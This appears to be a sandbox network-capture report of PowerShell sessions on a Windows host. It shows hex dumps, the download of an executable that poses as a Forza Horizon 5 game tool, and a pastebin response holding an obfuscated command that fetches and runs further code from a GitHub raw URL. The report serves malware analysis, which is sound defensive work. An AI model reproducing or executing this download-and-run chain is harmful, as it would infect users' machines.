                                                                                    Data Ascii: NHnLE0HU0AHPHHE8HD$ HINHnLE0HU0AHHHE8HD$ HIfNHonLE0HU0AHHHE8HD$ HI7NH@nLE0HU0AHPHHE8HD$ HINH}0t1HnH]0LE0AHHE8HD$ HIM
                                                                                    2024-10-15 16:08:11 UTC1378INData Raw: 10 00 00 72 18 4c 8b 41 f8 48 83 c2 27 49 2b c8 48 8d 41 f8 48 83 f8 1f 77 2f 49 8b c8 e8 32 32 00 00 48 8b 0b ba 10 00 00 00 48 89 33 48 89 73 10 48 89 73 08 48 8b 5c 24 30 48 8b 74 24 38 48 83 c4 20 5f e9 0b 32 00 00 ff 15 f5 4a 00 00 cc cc cc cc cc cc cc cc cc cc cc cc cc 48 89 5c 24 10 48 89 6c 24 18 56 57 41 57 48 83 ec 20 48 8b 69 18 49 8b f0 4c 8b fa 48 8b d9 4c 3b c5 77 21 48 8b f9 48 83 fd 10 72 03 48 8b 39 48 89 71 10 48 8b cf e8 57 3d 00 00 c6 04 37 00 e9 ef 00 00 00 48 bf ff ff ff ff ff ff ff 7f 48 3b f7 0f 87 f9 00 00 00 48 8b ce 4c 89 74 24 40 48 83 c9 0f 48 3b cf 77 3a 48 8b d5 48 8b c7 48 d1 ea 48 2b c2 48 3b e8 77 29 48 8d 04 2a 48 8b f9 48 3b c8 48 0f 42 f8 48 8d 47 01 48 3d 00 10 00 00 72 35 48 8d 48 27 48 3b c8 0f 86 b6 00 00 00 eb 0a
                                                                                    Data Ascii: rLAH'I+HAHw/I22HH3HsHsH\$0Ht$8H _2JH\$Hl$VWAWH HiILHL;w!HHrH9HqHW=7HH;HLt$@HH;w:HHHH+H;w)H*HH;HBHGH=r5HH'H;
                                                                                    2024-10-15 16:08:11 UTC1378INData Raw: ee 2c 00 00 90 41 b9 00 40 00 00 4d 8b 47 10 49 8b 57 08 49 8b 0f ff 15 be 43 00 00 ba 18 00 00 00 49 8b cf e8 c9 2c 00 00 90 4d 85 ed 74 36 4d 2b e5 49 8b c5 49 81 fc 00 10 00 00 72 1c 49 83 c4 27 4d 8b 6d f8 49 2b c5 48 83 c0 f8 48 83 f8 1f 76 07 ff 15 89 45 00 00 cc 49 8b d4 49 8b cd e8 8d 2c 00 00 48 8b 4d 27 48 33 cc e8 d9 28 00 00 4c 8d 9c 24 d0 00 00 00 49 8b 5b 30 49 8b 73 40 49 8b 7b 48 49 8b e3 41 5f 41 5e 41 5d 41 5c 5d c3 e8 93 22 00 00 90 cc cc 40 53 48 83 ec 20 48 8b d9 48 8b 09 48 85 c9 74 3a 48 8b 53 10 48 2b d1 48 81 fa 00 10 00 00 72 18 4c 8b 41 f8 48 83 c2 27 49 2b c8 48 8d 41 f8 48 83 f8 1f 77 1b 49 8b c8 e8 1a 2c 00 00 33 c0 48 89 03 48 89 43 08 48 89 43 10 48 83 c4 20 5b c3 ff 15 f1 44 00 00 cc cc cc cc cc cc cc cc cc 48 8b 15 c1 6b
                                                                                    Data Ascii: ,A@MGIWICI,Mt6M+IIrI'MmI+HHvEII,HM'H3(L$I[0Is@I{HIA_A^A]A\]"@SH HHHt:HSH+HrLAH'I+HAHwI,3HHCHCH [DHk
                                                                                    2024-10-15 16:08:11 UTC1378INData Raw: 8b c7 f0 0f c1 43 0c 83 f8 01 75 09 48 8b 03 48 8b cb ff 50 08 48 8b 05 a4 5e 00 00 48 85 c0 74 04 f0 ff 40 08 48 8b 05 8c 5e 00 00 48 89 05 55 67 00 00 48 8b 05 86 5e 00 00 48 8b 1d 4f 67 00 00 48 89 05 48 67 00 00 48 85 db 74 27 8b c7 f0 0f c1 43 08 83 f8 01 75 1b 48 8b 03 48 8b cb ff 10 f0 0f c1 7b 0c 83 ff 01 75 09 48 8b 03 48 8b cb ff 50 08 b0 01 eb 02 32 c0 48 8b 8c 24 80 01 00 00 48 33 cc e8 5e 23 00 00 4c 8d 9c 24 90 01 00 00 49 8b 5b 10 49 8b 73 18 49 8b e3 5f c3 cc cc cc cc cc cc cc cc cc 48 89 5c 24 18 55 56 57 41 56 41 57 48 81 ec 90 01 00 00 48 8b 05 c6 5d 00 00 48 33 c4 48 89 84 24 80 01 00 00 4c 8b f2 48 8b e9 48 8b 05 d6 5d 00 00 8b 30 33 d2 8d 4a 02 ff 15 f1 3d 00 00 48 8b d8 45 33 ff 48 c7 c7 ff ff ff ff 48 3b c7 0f 84 76 01 00 00 c7 44
                                                                                    Data Ascii: CuHHPH^Ht@H^HUgH^HOgHHgHt'CuHH{uHHP2H$H3^#L$I[IsI_H\$UVWAVAWHH]H3H$LHH]03J=HE3HH;vD
                                                                                    2024-10-15 16:08:11 UTC1378INData Raw: 8b 01 48 8d 54 24 40 48 3b ca 0f 95 c2 ff 50 20 48 8b 8c 24 80 00 00 00 48 33 cc e8 66 1e 00 00 48 8b 9c 24 a0 00 00 00 48 81 c4 90 00 00 00 5f c3 cc cc cc cc cc 48 89 5c 24 08 48 89 74 24 10 48 89 7c 24 18 55 48 8d 6c 24 a9 48 81 ec d0 00 00 00 48 8b 05 cd 58 00 00 48 33 c4 48 89 45 47 48 8d 05 cf 3c 00 00 48 89 45 e7 c7 45 ef 47 01 86 01 c7 45 f3 53 01 2b 01 c7 45 f7 1f 01 47 01 c7 45 fb 86 01 73 01 c7 45 ff 2b 01 17 01 c7 45 03 5a 01 47 01 c7 45 07 82 01 63 01 c7 45 0b 2b 01 a6 01 c7 45 0f 47 01 8e 01 c7 45 13 e3 01 bf 01 c7 45 17 0f 01 0f 01 c7 45 1b 0f 01 3c 01 c7 45 1f d4 01 86 01 c7 45 23 52 01 68 01 c7 45 27 47 01 84 01 c7 45 2b 76 01 57 01 48 8b 1d 74 58 00 00 48 8d 55 b7 48 8d 4d e7 e8 47 08 00 00 90 48 8b 45 b7 48 8b 55 bf 48 3b c2 74 12 80 78
                                                                                    Data Ascii: HT$@H;P H$H3fH$H_H\$Ht$H|$UHl$HHXH3HEGH<HEEGES+EGEsE+EZGEcE+EGEEE<EE#RhE'GE+vWHtXHUHMGHEHUH;tx
                                                                                    2024-10-15 16:08:11 UTC1378INData Raw: 04 41 ff d0 90 48 8b 45 b7 48 8b 55 bf 48 3b c2 74 14 66 90 80 78 01 00 74 03 80 30 0f 48 83 c0 02 48 3b c2 75 ee 4c 8d 45 b7 48 8d 55 cf 48 8b cb e8 4e 11 00 00 90 48 8b 4d b7 48 85 c9 74 3b 48 8b 45 c7 48 2b c1 48 d1 f8 48 8d 14 00 48 8b c1 48 81 fa 00 10 00 00 72 1c 48 83 c2 27 48 8b 49 f8 48 2b c1 48 83 c0 f8 48 83 f8 1f 76 07 ff 15 47 35 00 00 cc e8 51 1c 00 00 48 8b 5d cf 48 8d 7b 08 48 8b 05 6a 53 00 00 48 8b 08 48 8d 45 d7 48 89 44 24 20 41 b9 04 00 00 00 4c 8d 45 cf 48 8b d7 48 8b 49 08 ff 15 37 33 00 00 48 63 4d cf 48 83 c1 04 48 03 cf 48 89 0d fd 5b 00 00 48 83 c3 57 48 89 1d 2a 5c 00 00 48 8d 86 80 64 00 00 48 89 45 e7 c7 45 ef 00 01 8a 01 c7 45 f3 c3 01 0f 01 c7 45 f7 0f 01 0f 01 c7 45 fb 47 01 84 01 48 c7 45 ff 32 01 00 00 c7 45 07 00 00 47
                                                                                    Data Ascii: AHEHUH;tfxt0HH;uLEHUHNHMHt;HEH+HHHHrH'HIH+HHvG5QH]H{HjSHHEHD$ ALEHHI73HcMHHH[HWH*\HdHEEEEEGHE2EG
                                                                                    2024-10-15 16:08:11 UTC1378INData Raw: 18 4c 89 64 24 20 55 41 56 41 57 48 8b ec 48 83 ec 70 48 8b 05 49 4e 00 00 48 33 c4 48 89 45 f0 48 83 3d a2 57 00 00 00 0f 85 ce 04 00 00 0f 57 c9 f3 0f 7f 4d c8 45 33 e4 4c 89 65 d8 c7 45 e0 55 48 89 e5 c7 45 e4 48 83 ec 20 41 8d 54 24 08 48 8d 4d c8 e8 49 0f 00 00 48 8d 7d e0 48 8b 75 d8 48 8b 5d d0 48 3b de 74 0e 0f b6 07 88 03 48 ff c3 48 89 5d d0 eb 17 4c 8b c7 48 8b d3 48 8d 4d c8 e8 3b 0d 00 00 48 8b 75 d8 48 8b 5d d0 48 ff c7 48 8d 45 e8 48 3b f8 75 ca 66 c7 45 e0 48 b8 48 8b 05 ea 56 00 00 48 89 45 e2 48 8b c6 48 2b 45 c8 48 83 f8 0a 73 16 ba 0a 00 00 00 48 8d 4d c8 e8 db 0e 00 00 48 8b 75 d8 48 8b 5d d0 48 8d 7d e0 48 3b de 74 0e 0f b6 07 88 03 48 ff c3 48 89 5d d0 eb 17 4c 8b c7 48 8b d3 48 8d 4d c8 e8 cd 0c 00 00 48 8b 75 d8 48 8b 5d d0 48 ff
                                                                                    Data Ascii: Ld$ UAVAWHHpHINH3HEH=WWME3LeEUHEH AT$HMIH}HuH]H;tHH]LHHM;HuH]HHEH;ufEHHVHEHH+EHsHMHuH]H}H;tHH]LHHMHuH]H
                                                                                    2024-10-15 16:08:11 UTC1378INData Raw: 83 3d 59 52 00 00 00 0f 84 15 04 00 00 48 83 3d 53 52 00 00 00 74 51 48 8b 05 12 49 00 00 48 8b 08 48 8d 45 17 48 89 44 24 20 41 b9 1a 00 00 00 4c 8d 45 27 48 8b 15 f5 51 00 00 48 8b 49 08 ff 15 db 28 00 00 41 b8 1a 00 00 00 48 8d 15 ee 48 00 00 48 8d 4d 27 e8 3c 1d 00 00 85 c0 0f 95 c0 84 c0 0f 85 ba 03 00 00 e8 23 fa ff ff 48 8b 0d dc 51 00 00 48 ff c9 48 23 0d da 51 00 00 48 8b 05 c3 51 00 00 48 8b 14 c8 45 33 f6 4c 89 75 f7 4c 89 75 07 4c 89 75 0f 0f 10 02 0f 11 45 f7 0f 10 4a 10 0f 11 4d 07 4c 89 72 10 48 c7 42 18 0f 00 00 00 44 88 32 48 8b 0d 93 51 00 00 48 ff c9 48 23 0d 91 51 00 00 48 8b 05 7a 51 00 00 48 8b 1c c8 48 8b 53 18 48 83 fa 10 72 30 48 8b 0b 48 ff c2 48 81 fa 00 10 00 00 72 1c 48 83 c2 27 4c 8b 41 f8 49 2b c8 48 8d 41 f8 48 83 f8 1f 0f
                                                                                    Data Ascii: =YRH=SRtQHIHHEHD$ ALE'HQHI(AHHHM'<#HQHH#QHQHE3LuLuLuEJMLrHBD2HQHH#QHzQHHSHr0HHHrH'LAI+HAH
                                                                                    2024-10-15 16:08:11 UTC1378INData Raw: 48 8b cf e8 39 18 00 00 48 8b 15 d7 4c 00 00 48 03 df 48 8b cb 4c 3b fd 77 25 4d 8b c6 e8 1f 18 00 00 4c 8b c5 49 8d 0c 1e 4d 2b c7 33 d2 49 c1 e0 03 e8 99 16 00 00 4d 8b c6 48 8b ce eb 34 48 8d 3c ed 00 00 00 00 4c 8b c7 e8 f2 17 00 00 48 8b 05 90 4c 00 00 48 8b ce 49 8d 1c 06 48 8d 14 07 48 2b da 4c 8b c3 e8 d5 17 00 00 48 8d 0c 33 4c 8b c7 33 d2 e8 56 16 00 00 48 8b 0d 65 4c 00 00 4c 8b 74 24 28 48 8b 7c 24 30 48 8b 5c 24 40 48 85 c9 74 35 48 8b 05 52 4c 00 00 48 8d 14 c5 00 00 00 00 48 81 fa 00 10 00 00 72 18 4c 8b 41 f8 48 83 c2 27 49 2b c8 48 8d 41 f8 48 83 f8 1f 77 2a 49 8b c8 e8 dc 0b 00 00 48 01 2d 1d 4c 00 00 48 8b 6c 24 48 4c 8b 7c 24 20 48 89 35 04 4c 00 00 48 8b 74 24 50 48 83 c4 38 c3 ff 15 a4 24 00 00 cc e8 96 d6 ff ff cc e8 10 00 00 00 cc
                                                                                    Data Ascii: H9HLHHL;w%MLIM+3IMH4H<LHLHIHH+LH3L3VHeLLt$(H|$0H\$@Ht5HRLHHrLAH'I+HAHw*IH-LHl$HL|$ H5LHt$PH8$


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1192.168.2.749703185.199.109.1334436648C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-15 16:08:12 UTC196OUTGET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/FH5.exe HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                    Host: raw.githubusercontent.com
                                                                                    2024-10-15 16:08:12 UTC901INHTTP/1.1 200 OK
                                                                                    Connection: close
                                                                                    Content-Length: 56320
                                                                                    Cache-Control: max-age=300
                                                                                    Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                    Content-Type: application/octet-stream
                                                                                    ETag: "fbd9a681f4acce63a6718a2c29c8db9ab29a56e7e684d03951f580344762e00e"
                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                    X-Content-Type-Options: nosniff
                                                                                    X-Frame-Options: deny
                                                                                    X-XSS-Protection: 1; mode=block
                                                                                    X-GitHub-Request-Id: 37F3:2518BA:975F2A:A51381:670E9369
                                                                                    Accept-Ranges: bytes
                                                                                    Date: Tue, 15 Oct 2024 16:08:12 GMT
                                                                                    Via: 1.1 varnish
                                                                                    X-Served-By: cache-dfw-kdfw8210100-DFW
                                                                                    X-Cache: MISS
                                                                                    X-Cache-Hits: 0
                                                                                    X-Timer: S1729008493.558934,VS0,VE139
                                                                                    Vary: Authorization,Accept-Encoding,Origin
                                                                                    Access-Control-Allow-Origin: *
                                                                                    Cross-Origin-Resource-Policy: cross-origin
                                                                                    X-Fastly-Request-ID: 24b93079e1e4ea7249ef132f625fdfe099b30646
                                                                                    Expires: Tue, 15 Oct 2024 16:13:12 GMT
                                                                                    Source-Age: 0
                                                                                    2024-10-15 16:08:12 UTC1378INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 02 00 9d f8 f7 ed 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 30 00 00 86 00 00 00 54 00 00 00 00 00 00 00 00 00 00 00 20 00 00 00 00 00 40 01 00 00 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 01 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 40 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 20 00 00 00 00 00
                                                                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEd"0T @ `@@
                                                                                    2024-10-15 16:08:12 UTC1378INData Raw: 00 0a 28 07 00 00 06 2a a6 02 7b 04 00 00 04 6f 25 00 00 0a 2c 16 02 7b 05 00 00 04 6f 36 00 00 0a 28 37 00 00 0a 28 08 00 00 06 2a 28 09 00 00 06 2a 8e 02 7b 04 00 00 04 6f 25 00 00 0a 2c 15 02 7b 05 00 00 04 6f 36 00 00 0a 28 37 00 00 0a 28 08 00 00 06 2a 46 02 7b 13 00 00 04 6f 38 00 00 0a 28 0c 00 00 06 2a 5a 02 7b 16 00 00 04 6f 36 00 00 0a 28 37 00 00 0a 28 0a 00 00 06 2a 1a 28 0b 00 00 06 2a 7a 03 2c 13 02 7b 01 00 00 04 2c 0b 02 7b 01 00 00 04 6f 31 00 00 0a 02 03 28 39 00 00 0a 2a 00 13 30 05 00 2c 0d 00 00 04 00 00 11 02 73 3a 00 00 0a 7d 01 00 00 04 d0 03 00 00 02 28 3b 00 00 0a 73 3c 00 00 0a 0a 02 73 3d 00 00 0a 7d 02 00 00 04 02 73 3e 00 00 0a 7d 03 00 00 04 02 73 3f 00 00 0a 7d 04 00 00 04 02 73 40 00 00 0a 7d 05 00 00 04 02 73 41 00 00 0a
                                                                                    Data Ascii: (*{o%,{o6(7(*(*{o%,{o6(7(*F{o8(*Z{o6(7(*(*z,{,{o1(9*0,s:}(;s<s=}s>}s?}s@}sA
                                                                                    2024-10-15 16:08:12 UTC1378INData Raw: 02 7b 07 00 00 04 72 ab 01 00 70 6f 4d 00 00 0a 02 7b 07 00 00 04 20 0d 01 00 00 20 98 00 00 00 73 4e 00 00 0a 6f 1e 00 00 0a 02 7b 07 00 00 04 18 6f 50 00 00 0a 02 7b 07 00 00 04 16 6f 5e 00 00 0a 02 7b 07 00 00 04 72 bf 01 00 70 6f 51 00 00 0a 02 7b 15 00 00 04 20 83 00 00 00 1f 73 73 4b 00 00 0a 6f 4c 00 00 0a 02 7b 15 00 00 04 72 c9 01 00 70 6f 4d 00 00 0a 02 7b 15 00 00 04 20 82 00 00 00 1f 17 73 4e 00 00 0a 6f 1e 00 00 0a 02 7b 15 00 00 04 1f 0a 6f 50 00 00 0a 02 7b 15 00 00 04 72 db 01 00 70 6f 51 00 00 0a 02 7b 15 00 00 04 17 6f 55 00 00 0a 02 7b 15 00 00 04 02 fe 06 1d 00 00 06 73 56 00 00 0a 6f 5f 00 00 0a 02 7b 16 00 00 04 1c 1f 73 73 4b 00 00 0a 6f 4c 00 00 0a 02 7b 16 00 00 04 1a 8d 44 00 00 01 25 16 20 ff c9 9a 3b 9e 73 58 00 00 0a 6f 59 00
                                                                                    Data Ascii: {rpoM{ sNo{oP{o^{rpoQ{ ssKoL{rpoM{ sNo{oP{rpoQ{oU{sVo_{ssKoL{D% ;sXoY
                                                                                    2024-10-15 16:08:12 UTC1378INData Raw: 00 0a 02 7b 10 00 00 04 72 af 03 00 70 6f 4d 00 00 0a 02 7b 10 00 00 04 20 ac 00 00 00 1f 31 73 4e 00 00 0a 6f 1e 00 00 0a 02 7b 10 00 00 04 1f 0a 6f 50 00 00 0a 02 7b 10 00 00 04 16 6f 5e 00 00 0a 02 7b 10 00 00 04 72 c3 03 00 70 6f 51 00 00 0a 02 7b 11 00 00 04 17 6f 54 00 00 0a 02 7b 11 00 00 04 1c 1f 13 73 4b 00 00 0a 6f 4c 00 00 0a 02 7b 11 00 00 04 72 cd 03 00 70 6f 4d 00 00 0a 02 7b 11 00 00 04 20 9d 00 00 00 1f 11 73 4e 00 00 0a 6f 1e 00 00 0a 02 7b 11 00 00 04 16 6f 50 00 00 0a 02 7b 11 00 00 04 72 e7 03 00 70 6f 51 00 00 0a 02 7b 11 00 00 04 17 6f 55 00 00 0a 02 7b 08 00 00 04 02 fe 06 13 00 00 06 73 56 00 00 0a 6f 65 00 00 0a 02 7b 0a 00 00 04 1f 0a 6f 66 00 00 0a 02 7b 0a 00 00 04 02 fe 06 16 00 00 06 73 56 00 00 0a 6f 65 00 00 0a 02 7b 0c 00
                                                                                    Data Ascii: {rpoM{ 1sNo{oP{o^{rpoQ{oT{sKoL{rpoM{ sNo{oP{rpoQ{oU{sVoe{of{sVoe{
                                                                                    2024-10-15 16:08:12 UTC1378INData Raw: 0f 0c 0a 00 dd 0d 0f 0c 06 00 ee 0b 53 08 0a 00 e3 0b 0f 0c 12 00 bb 05 3a 06 06 00 35 02 53 08 06 00 25 08 d4 00 06 00 30 08 d4 00 0e 00 12 0a c0 07 06 00 77 08 53 08 06 00 86 03 53 08 0a 00 e5 0a 0f 0c 0e 00 c2 03 43 0a 06 00 d9 03 09 0b 06 00 99 03 3b 0b 06 00 1b 0a 5b 0b 06 00 89 09 db 08 0e 00 71 03 c0 07 0e 00 0a 04 c0 07 0e 00 4b 03 c6 08 0a 00 45 08 0f 0c 0a 00 1d 08 0f 0c 06 00 07 06 53 08 06 00 f9 0a 53 08 06 00 60 06 d4 00 06 00 05 03 d4 00 06 00 77 02 d4 00 06 00 36 08 d4 00 06 00 a2 02 53 08 06 00 7f 07 53 08 0a 00 19 08 0f 0c 0e 00 9e 0a c0 07 06 00 13 03 53 08 06 00 ae 02 53 08 0e 00 c0 05 c0 07 0a 00 a9 09 0f 0c 0a 00 14 09 0f 0c 12 00 4f 0d 3a 06 0a 00 40 03 0f 0c 06 00 36 0a 53 08 06 00 48 00 53 08 c7 00 02 09 00 00 77 00 2c 09 00 00 12
                                                                                    Data Ascii: S:5S%0wSSC;[qKESS`w6SSSSO:@6SHSw,
                                                                                    2024-10-15 16:08:12 UTC1378INData Raw: 55 0d 00 00 01 00 55 0d 00 00 01 00 55 0d 00 00 01 00 80 02 00 00 01 00 f7 09 00 00 02 00 e9 05 00 00 01 00 f7 09 00 00 02 00 e9 05 00 00 01 00 f7 09 00 00 02 00 e9 05 00 00 01 00 f7 09 00 00 02 00 e9 05 00 00 01 00 f7 09 00 00 02 00 e9 05 00 00 01 00 f7 09 00 00 02 00 e9 05 00 00 01 00 f7 09 00 00 02 00 e9 05 00 00 01 00 f7 09 00 00 02 00 e9 05 00 00 01 00 f7 09 00 00 02 00 e9 05 00 00 01 00 f7 09 00 00 02 00 e9 05 00 00 01 00 f7 09 00 00 02 00 e9 05 00 00 01 00 f7 09 00 00 02 00 e9 05 00 00 01 00 f7 09 00 00 02 00 e9 05 00 00 01 00 f7 09 00 00 02 00 e9 05 00 00 01 00 30 06 00 00 01 00 00 0b 00 00 01 00 04 0b 00 00 02 00 37 02 00 00 01 00 9b 08 00 00 01 00 7a 05 09 00 ec 0a 01 00 11 00 ec 0a 06 00 19 00 ec 0a 0a 00 29 00 ec 0a 10 00 31 00 ec 0a 10 00 39
                                                                                    Data Ascii: UUU07z)19
                                                                                    2024-10-15 16:08:12 UTC1378INData Raw: 03 00 04 80 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 65 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 7a 01 3b 01 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 7a 01 0f 0c 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 7a 01 53 08 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 83 01 3a 06 00 00 00 00 00 00 00 00 01 00 00 00 6c 0b 00 00 78 4e 00 00 01 00 00 00 82 0b 00 00 00 00 00 00 00 61 31 00 74 6f 6f 6c 53 74 72 69 70 53 74 61 74 75 73 4c 61 62 65 6c 31 00 66 6c 6f 77 4c 61 79 6f 75 74 50 61 6e 65 6c 31 00 46 6f 72 6d 31 00 73 74 61 74 75 73 53 74 72 69 70 31 00 67 72 6f 75 70 42 6f 78 31 00 49 6e 74 33 32 00 61 32 00 67 72 6f 75 70 42 6f 78 32 00 67 72 6f 75 70 42 6f 78 33 00 53 74 61 6e 64 20 66 6f 72 20 46 48 35 00 3c 4d 6f 64 75 6c 65 3e
                                                                                    Data Ascii: ez;zzS:lxNa1toolStripStatusLabel1flowLayoutPanel1Form1statusStrip1groupBox1Int32a2groupBox2groupBox3Stand for FH5<Module>
                                                                                    2024-10-15 16:08:12 UTC1378INData Raw: 70 69 6c 61 74 69 6f 6e 52 65 6c 61 78 61 74 69 6f 6e 73 41 74 74 72 69 62 75 74 65 00 41 73 73 65 6d 62 6c 79 50 72 6f 64 75 63 74 41 74 74 72 69 62 75 74 65 00 41 73 73 65 6d 62 6c 79 43 6f 70 79 72 69 67 68 74 41 74 74 72 69 62 75 74 65 00 41 73 73 65 6d 62 6c 79 43 6f 6d 70 61 6e 79 41 74 74 72 69 62 75 74 65 00 52 75 6e 74 69 6d 65 43 6f 6d 70 61 74 69 62 69 6c 69 74 79 41 74 74 72 69 62 75 74 65 00 67 65 74 5f 56 61 6c 75 65 00 73 65 74 5f 56 61 6c 75 65 00 76 61 6c 75 65 00 53 74 61 6e 64 20 66 6f 72 20 46 48 35 2e 65 78 65 00 67 65 74 5f 53 69 7a 65 00 73 65 74 5f 53 69 7a 65 00 73 65 74 5f 41 75 74 6f 53 69 7a 65 00 73 65 74 5f 43 6c 69 65 6e 74 53 69 7a 65 00 49 53 75 70 70 6f 72 74 49 6e 69 74 69 61 6c 69 7a 65 00 46 6f 72 6d 31 5f 52 65 73 69
                                                                                    Data Ascii: pilationRelaxationsAttributeAssemblyProductAttributeAssemblyCopyrightAttributeAssemblyCompanyAttributeRuntimeCompatibilityAttributeget_Valueset_ValuevalueStand for FH5.exeget_Sizeset_Sizeset_AutoSizeset_ClientSizeISupportInitializeForm1_Resi
                                                                                    2024-10-15 16:08:12 UTC1378INData Raw: 65 72 00 53 79 73 74 65 6d 2e 43 6f 64 65 44 6f 6d 2e 43 6f 6d 70 69 6c 65 72 00 70 61 74 74 65 72 6e 73 63 61 6e 54 69 6d 65 72 00 6d 61 69 6e 6c 6f 6f 70 54 69 6d 65 72 00 70 72 6f 63 65 73 73 57 61 69 74 54 69 6d 65 72 00 70 72 6f 63 65 73 73 53 74 61 72 74 54 69 6d 65 72 00 49 43 6f 6e 74 61 69 6e 65 72 00 67 65 74 53 70 69 6e 53 75 70 65 72 00 73 65 74 5f 55 73 65 56 69 73 75 61 6c 53 74 79 6c 65 42 61 63 6b 43 6f 6c 6f 72 00 67 65 74 5f 43 75 72 73 6f 72 00 53 65 74 53 79 73 74 65 6d 43 75 72 73 6f 72 00 2e 63 74 6f 72 00 2e 63 63 74 6f 72 00 49 6e 74 50 74 72 00 73 74 72 00 68 63 75 72 00 53 79 73 74 65 6d 2e 44 69 61 67 6e 6f 73 74 69 63 73 00 53 79 73 74 65 6d 2e 52 75 6e 74 69 6d 65 2e 49 6e 74 65 72 6f 70 53 65 72 76 69 63 65 73 00 53 79 73 74
                                                                                    Data Ascii: erSystem.CodeDom.CompilerpatternscanTimermainloopTimerprocessWaitTimerprocessStartTimerIContainergetSpinSuperset_UseVisualStyleBackColorget_CursorSetSystemCursor.ctor.cctorIntPtrstrhcurSystem.DiagnosticsSystem.Runtime.InteropServicesSyst
                                                                                    2024-10-15 16:08:12 UTC1378INData Raw: 63 00 72 00 56 00 61 00 6c 00 00 21 66 00 6c 00 6f 00 77 00 4c 00 61 00 79 00 6f 00 75 00 74 00 50 00 61 00 6e 00 65 00 6c 00 31 00 00 13 67 00 72 00 6f 00 75 00 70 00 42 00 6f 00 78 00 31 00 00 09 53 00 65 00 6c 00 66 00 00 11 61 00 64 00 64 00 78 00 70 00 42 00 74 00 6e 00 00 0d 41 00 64 00 64 00 20 00 58 00 50 00 00 11 61 00 64 00 64 00 78 00 70 00 56 00 61 00 6c 00 00 1f 67 00 65 00 74 00 53 00 70 00 69 00 6e 00 53 00 75 00 70 00 65 00 72 00 56 00 61 00 6c 00 00 23 67 00 65 00 74 00 53 00 70 00 69 00 6e 00 52 00 65 00 67 00 75 00 6c 00 61 00 72 00 56 00 61 00 6c 00 00 23 67 00 65 00 74 00 53 00 70 00 69 00 6e 00 52 00 65 00 67 00 75 00 6c 00 61 00 72 00 42 00 74 00 6e 00 00 1d 41 00 64 00 64 00 20 00 57 00 68 00 65 00 65 00 6c 00 73 00 70 00 69 00 6e
                                                                                    Data Ascii: crVal!flowLayoutPanel1groupBox1SelfaddxpBtnAdd XPaddxpValgetSpinSuperVal#getSpinRegularVal#getSpinRegularBtnAdd Wheelspin


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2192.168.2.749764104.20.3.2354437548C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-15 16:08:26 UTC169OUTGET /raw/sA04Mwk2 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                    Host: pastebin.com
                                                                                    Connection: Keep-Alive
                                                                                    2024-10-15 16:08:26 UTC397INHTTP/1.1 200 OK
                                                                                    Date: Tue, 15 Oct 2024 16:08:26 GMT
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    x-frame-options: DENY
                                                                                    x-content-type-options: nosniff
                                                                                    x-xss-protection: 1;mode=block
                                                                                    cache-control: public, max-age=1801
                                                                                    CF-Cache-Status: HIT
                                                                                    Age: 625
                                                                                    Last-Modified: Tue, 15 Oct 2024 15:58:01 GMT
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8d31115bbafeeaa4-DFW
                                                                                    2024-10-15 16:08:26 UTC139INData Raw: 38 35 0d 0a 63 61 6c 6c 69 54 28 57 49 4e 44 4f 57 53 5f 4e 54 20 28 22 72 61 77 2e 67 69 22 2b 22 74 68 75 62 22 2b 22 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 22 2b 22 6f 6d 2f 4e 65 22 2b 22 74 68 33 4e 2f 6e 61 39 6f 77 33 34 39 35 72 61 79 67 77 69 34 22 2b 22 67 79 72 68 75 61 77 65 72 61 77 65 72 61 2f 6d 61 69 6e 2f 67 61 62 65 72 2e 74 78 74 22 29 20 2d 75 73 65 62 61 73 69 63 70 61 72 73 69 6e 67 29 0d 0a
                                                                                    Data Ascii: 85calliT(WINDOWS_NT ("raw.gi"+"thub"+"usercontent.c"+"om/Ne"+"th3N/na9ow3495raygwi4"+"gyrhuawerawera/main/gaber.txt") -usebasicparsing)
                                                                                    2024-10-15 16:08:26 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3192.168.2.749772185.199.109.1334437548C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    TimestampBytes transferredDirectionData
